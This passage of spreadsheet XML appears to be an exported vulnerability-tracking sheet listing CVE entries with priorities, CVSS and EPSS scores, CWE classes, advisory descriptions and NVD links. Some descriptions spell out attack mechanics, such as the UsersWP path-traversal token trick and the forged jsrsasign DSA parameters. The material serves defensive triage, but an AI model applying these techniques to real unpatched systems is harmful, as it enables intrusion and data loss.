          <t>A vulnerability was identified in D-Link DIR-605 B1v202WWB03. This issue affects the function tunnel_set_params of the file progs.gpl/pppd.alpha/l2tp/tunnel.c of the component L2TP Control Message Parser. Such manipulation of the argument peer_hostname  leads to off-by-one. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="M1806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86297</t>
        </is>
      </c>
    </row>
    <row r="1807">
      <c r="A1807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="C1807" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1807" s="5" t="inlineStr"/>
      <c r="F1807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1807" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1807" s="5" t="inlineStr"/>
      <c r="I1807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1807" s="5" t="inlineStr"/>
      <c r="K1807" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="L1807" s="5" t="inlineStr">
        <is>
          <t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M1807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="1808">
      <c r="A1808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="C1808" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1808" s="5" t="inlineStr"/>
      <c r="F1808" s="5" t="inlineStr"/>
      <c r="G1808" s="5" t="inlineStr">
        <is>
          <t>java, mongodb</t>
        </is>
      </c>
      <c r="H1808" s="5" t="inlineStr"/>
      <c r="I1808" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1808" s="5" t="inlineStr"/>
      <c r="K1808" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1808" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="M1808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="1809">
      <c r="A1809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88897</t>
        </is>
      </c>
      <c r="C1809" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1809" s="5" t="inlineStr"/>
      <c r="F1809" s="5" t="inlineStr"/>
      <c r="G1809" s="5" t="inlineStr"/>
      <c r="H1809" s="5" t="inlineStr"/>
      <c r="I1809" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1809" s="5" t="inlineStr"/>
      <c r="K1809" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L1809" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS through 1.0.0-alpha.3 accepts API authentication credentials through URL query string parameters in REST API routes. Attackers with access to web server, proxy, or monitoring logs can recover valid API token pairs that grant full API access.</t>
        </is>
      </c>
      <c r="M1809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88897</t>
        </is>
      </c>
    </row>
    <row r="1810">
      <c r="A1810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89054</t>
        </is>
      </c>
      <c r="C1810" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1810" s="5" t="inlineStr"/>
      <c r="F1810" s="5" t="inlineStr"/>
      <c r="G1810" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H1810" s="5" t="inlineStr"/>
      <c r="I1810" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1810" s="5" t="inlineStr"/>
      <c r="K1810" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1810" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in OpenNMS Horizon allows configuration changes without authentication. The Spring Security policy for the /api/v2 REST API defines authorization rules for every HTTP method except PATCH, so the shipped @PATCH configuration endpoints for event configuration and SNMP data collection (which enable and disable event definitions and data-collection sources) are reachable with no authorization enforced. An unauthenticated attacker able to reach the web UI can disable event definitions and SNMP data collection, suppressing event and alarm generation and stopping metric collection - silently degrading monitoring and detection - with the change persisted and reloaded into the running system.
The solution is to upgrade to Horizon 36.0.4 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M1810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89054</t>
        </is>
      </c>
    </row>
    <row r="1811">
      <c r="A1811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1811" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-58375</t>
        </is>
      </c>
      <c r="C1811" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1811" s="5" t="inlineStr"/>
      <c r="F1811" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1811" s="5" t="inlineStr"/>
      <c r="H1811" s="5" t="inlineStr"/>
      <c r="I1811" s="5" t="inlineStr">
        <is>
          <t>2025-09-06</t>
        </is>
      </c>
      <c r="J1811" s="5" t="inlineStr"/>
      <c r="K1811" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1811" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Versions 14.96.9 and below, and 15.0.0 through 15.71.0 have an insecure endpoint parameter that is vulnerable to error-based SQL Injection through lack of validation. Sensitive information such as versioning can be retrieved. This issue is fixed in versions 14.96.10 and 15.72.0.</t>
        </is>
      </c>
      <c r="M1811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-58375</t>
        </is>
      </c>
    </row>
    <row r="1812">
      <c r="A1812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1812" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-63822</t>
        </is>
      </c>
      <c r="C1812" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1812" s="5" t="inlineStr"/>
      <c r="F1812" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1812" s="5" t="inlineStr"/>
      <c r="H1812" s="5" t="inlineStr"/>
      <c r="I1812" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1812" s="5" t="inlineStr"/>
      <c r="K1812" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1812" s="5" t="inlineStr">
        <is>
          <t>SirenGPS Android Application 2.19.44 is vulnerable to Incorrect Access Control. An authenticated attacker can manipulate user identifier parameters to bypass authorization controls and gain unauthorized READ and WRITE access to other users' personal information. The API fails to validate that the requesting user is authorized to access the target user's data.</t>
        </is>
      </c>
      <c r="M1812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-63822</t>
        </is>
      </c>
    </row>
    <row r="1813">
      <c r="A1813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1813" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-9566</t>
        </is>
      </c>
      <c r="C1813" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1813" s="5" t="inlineStr"/>
      <c r="F1813" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1813" s="5" t="inlineStr"/>
      <c r="H1813" s="5" t="inlineStr"/>
      <c r="I1813" s="5" t="inlineStr">
        <is>
          <t>2025-09-05</t>
        </is>
      </c>
      <c r="J1813" s="5" t="inlineStr"/>
      <c r="K1813" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1813" s="5" t="inlineStr">
        <is>
          <t>There's a vulnerability in podman where an attacker may use the kube play command to overwrite host files when the kube file container a Secrete or a ConfigMap volume mount and such volume contains a symbolic link to a host file path. In a successful attack, the attacker can only control the target file to be overwritten but not the content to be written into the file.
Binary-Affected: podman
Upstream-version-introduced: v4.0.0
Upstream-version-fixed: v5.6.1</t>
        </is>
      </c>
      <c r="M1813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-9566</t>
        </is>
      </c>
    </row>
    <row r="1814">
      <c r="A1814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18147</t>
        </is>
      </c>
      <c r="C1814" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1814" s="5" t="inlineStr"/>
      <c r="F1814" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1814" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1814" s="5" t="inlineStr"/>
      <c r="I1814" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1814" s="5" t="inlineStr"/>
      <c r="K1814" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1814" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. An unauthenticated remote attacker could exploit a DOM Cross-Site Scripting (XSS) vulnerability in the FreeIPA/IdM Web UI password reset page. By enticing a victim to click a specially crafted link and complete a password reset, the attacker could inject and execute arbitrary JavaScript code. This allows the attacker to perform actions within the victim's authenticated session, potentially leading to full administrative control if an IdM administrator is targeted.</t>
        </is>
      </c>
      <c r="M1814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18147</t>
        </is>
      </c>
    </row>
    <row r="1815">
      <c r="A1815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19219</t>
        </is>
      </c>
      <c r="C1815" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1815" s="5" t="inlineStr"/>
      <c r="F1815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1815" s="5" t="inlineStr"/>
      <c r="H1815" s="5" t="inlineStr"/>
      <c r="I1815" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1815" s="5" t="inlineStr"/>
      <c r="K1815" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-434</t>
        </is>
      </c>
      <c r="L1815" s="5" t="inlineStr">
        <is>
          <t>In Progress® Telerik® UI for AJAX prior to v2026.3.812, insufficient integrity protection of dialog request parameters used by the RadEditor file browser may allow an attacker who has obtained certain application encryption key material to alter the folders the file browser reads from, writes to, and uploads into, potentially resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M1815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19219</t>
        </is>
      </c>
    </row>
    <row r="1816">
      <c r="A1816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19303</t>
        </is>
      </c>
      <c r="C1816" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1816" s="5" t="inlineStr"/>
      <c r="F1816" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1816" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1816" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1816" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1816" s="5" t="inlineStr"/>
      <c r="K1816" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1816" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to delete arbitrary local files or directories due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M1816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19303</t>
        </is>
      </c>
    </row>
    <row r="1817">
      <c r="A1817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19594</t>
        </is>
      </c>
      <c r="C1817" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1817" s="5" t="inlineStr"/>
      <c r="F1817" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1817" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1817" s="5" t="inlineStr"/>
      <c r="I1817" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1817" s="5" t="inlineStr"/>
      <c r="K1817" s="5" t="inlineStr">
        <is>
          <t>CWE-141, CWE-22</t>
        </is>
      </c>
      <c r="L1817" s="5" t="inlineStr">
        <is>
          <t>Insufficient input sanitization in Snowflake Python API (`snowflake.core`) versions prior to 1.13.0 allowed confused-deputy privilege escalation through two related weaknesses: path traversal (CWE-22) via unencoded `..` identifier path segments, and HTTP parameter pollution (CWE-141) via unencoded `&amp;`/`#`/`=` characters in query string values. An attacker with access to a downstream application built on snowflake.core could exploit the path traversal by supplying `..` as an object name, causing `snowflake.core` to issue REST requests against a parent resource or exploit the parameter pollution by injecting `&amp;`/`#`/`=` into a free-form name field to override constraints on swap, clone, or rename operations — all executed under the application's privileged session. Successful exploitation requires the attacker to control an identifier or object-name string in an application built on snowflake.core that passes it to `snowflake.core` under a higher-privileged Snowflake session (e.g., an EXECUTE AS OWNER stored procedure, Streamlit app, or Native App). The fix is available in Snowflake Python API version 1.13.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M1817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19594</t>
        </is>
      </c>
    </row>
    <row r="1818">
      <c r="A1818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19693</t>
        </is>
      </c>
      <c r="C1818" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1818" s="5" t="inlineStr"/>
      <c r="F1818" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1818" s="5" t="inlineStr"/>
      <c r="H1818" s="5" t="inlineStr"/>
      <c r="I1818" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1818" s="5" t="inlineStr"/>
      <c r="K1818" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L1818" s="5" t="inlineStr">
        <is>
          <t>extract-zip through 2.0.1 containment-checks only the parent directory of each archive entry and never the entry's own final path component, so an archive containing two entries with identical names - a symlink whose target is outside the destination, followed by a regular file - writes through the planted symlink and yields an arbitrary file write outside the destination directory.</t>
        </is>
      </c>
      <c r="M1818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19693</t>
        </is>
      </c>
    </row>
    <row r="1819">
      <c r="A1819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19991</t>
        </is>
      </c>
      <c r="C1819" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1819" s="5" t="inlineStr"/>
      <c r="F1819" s="5" t="inlineStr"/>
      <c r="G1819" s="5" t="inlineStr"/>
      <c r="H1819" s="5" t="inlineStr"/>
      <c r="I1819" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1819" s="5" t="inlineStr"/>
      <c r="K1819" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1819" s="5" t="inlineStr">
        <is>
          <t>The UsersWP plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 1.2.70 via the upload_file_remove() AJAX handler. The plugin stores the value of an account 'file' form field taken directly from $_POST when no real $_FILES upload is provided (process_account() calls uwp_validate_fields() and array_merges the result with the empty output of UsersWP_Files::validate_uploads()). At storage time the value is only checked with validate_file(), which passes any string that does not contain a literal '../'. When the value is later processed by upload_file_remove(), it is again gated with validate_file() and then normalized through uwp_get_file_relative_url(); that helper performs a global str_replace() of the uploads base URL against the stored URL, allowing a crafted URL containing embedded '..&lt;uploads-baseurl&gt;' tokens to collapse into '../../' traversal sequences after the last validation. The transformed value is then appended to the uploads base directory and passed to wp_delete_file() without any canonical containment check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the affected site's server (including wp-config.</t>
        </is>
      </c>
      <c r="M1819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19991</t>
        </is>
      </c>
    </row>
    <row r="1820">
      <c r="A1820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32257</t>
        </is>
      </c>
      <c r="C1820" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1820" s="5" t="inlineStr"/>
      <c r="F1820" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1820" s="5" t="inlineStr"/>
      <c r="H1820" s="5" t="inlineStr"/>
      <c r="I1820" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1820" s="5" t="inlineStr"/>
      <c r="K1820" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1820" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.2.13, custom CSS supplied through the Brand Settings Styles field by a backend user with the backend.manage_branding permission is compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting against backend users. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M1820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32257</t>
        </is>
      </c>
    </row>
    <row r="1821">
      <c r="A1821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32258</t>
        </is>
      </c>
      <c r="C1821" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1821" s="5" t="inlineStr"/>
      <c r="F1821" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1821" s="5" t="inlineStr"/>
      <c r="H1821" s="5" t="inlineStr"/>
      <c r="I1821" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1821" s="5" t="inlineStr"/>
      <c r="K1821" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1821" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. From 1.2.10 through 1.2.12, authenticated backend users with the backend.manage_editor permission can store custom Markup Styles that are compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M1821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32258</t>
        </is>
      </c>
    </row>
    <row r="1822">
      <c r="A1822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33997</t>
        </is>
      </c>
      <c r="C1822" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1822" s="5" t="inlineStr"/>
      <c r="F1822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1822" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1822" s="5" t="inlineStr">
        <is>
          <t>docker:engine</t>
        </is>
      </c>
      <c r="I1822" s="5" t="inlineStr">
        <is>
          <t>2026-03-31</t>
        </is>
      </c>
      <c r="J1822" s="5" t="inlineStr"/>
      <c r="K1822" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-266</t>
        </is>
      </c>
      <c r="L1822" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. Prior to version 29.3.1, a security vulnerability has been detected that allows plugins privilege validation to be bypassed during docker plugin install. Due to an error in the daemon's privilege comparison logic, the daemon may incorrectly accept a privilege set that differs from the one approved by the user. Plugins that request exactly one privilege are also affected, because no comparison is performed at all. This issue has been patched in version 29.3.1.</t>
        </is>
      </c>
      <c r="M1822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33997</t>
        </is>
      </c>
    </row>
    <row r="1823">
      <c r="A1823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44249</t>
        </is>
      </c>
      <c r="C1823" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1823" s="5" t="inlineStr"/>
      <c r="F1823" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1823" s="5" t="inlineStr"/>
      <c r="H1823" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1823" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1823" s="5" t="inlineStr"/>
      <c r="K1823" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-284, CWE-697</t>
        </is>
      </c>
      <c r="L1823" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-handler prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can bypass IPv6 subnet rules due to an incorrect masking operation in IpSubnetFilterRule.compareTo(). Valid public IP addresses can bypass the restrictions. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44249</t>
        </is>
      </c>
    </row>
    <row r="1824">
      <c r="A1824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44745</t>
        </is>
      </c>
      <c r="C1824" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1824" s="5" t="inlineStr"/>
      <c r="F1824" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1824" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1824" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I1824" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J1824" s="5" t="inlineStr"/>
      <c r="K1824" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L1824" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not properly validate incoming request headers during the OAuth2 login flow under certain configurations. This allows an unauthenticated remote attacker to craft a malicious link which, when clicked by a victim, could lead to unauthorized access. Successful exploitation results in a high impact to the confidentiality and integrity with no impact on the availability of the application.</t>
        </is>
      </c>
      <c r="M1824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44745</t>
        </is>
      </c>
    </row>
    <row r="1825">
      <c r="A1825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4600</t>
        </is>
      </c>
      <c r="C1825" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1825" s="5" t="inlineStr"/>
      <c r="F1825" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1825" s="5" t="inlineStr"/>
      <c r="H1825" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I1825" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J1825" s="5" t="inlineStr"/>
      <c r="K1825" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1825" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign before 11.1.1 are vulnerable to Improper Verification of Cryptographic Signature via the DSA domain-parameter validation in KJUR.crypto.DSA.setPublic (and the related DSA/X509 verification flow in src/dsa-2.0.js). An attacker can forge DSA signatures or X.509 certificates that X509.verifySignature() accepts by supplying malicious domain parameters such as g=1, y=1, and a fixed r=1, which make the verification equation true for any hash.</t>
        </is>
      </c>
      <c r="M1825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4600</t>
        </is>
      </c>
    </row>
    <row r="1826">
      <c r="A1826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46099</t>
        </is>
      </c>
      <c r="C1826" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1826" s="5" t="inlineStr"/>
      <c r="F1826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1826" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1826" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1826" s="5" t="inlineStr">
        <is>
          <t>2026-05-27</t>
        </is>
      </c>
      <c r="J1826" s="5" t="inlineStr"/>
      <c r="K1826" s="5" t="inlineStr">
        <is>
          <t>CWE-911</t>
        </is>
      </c>
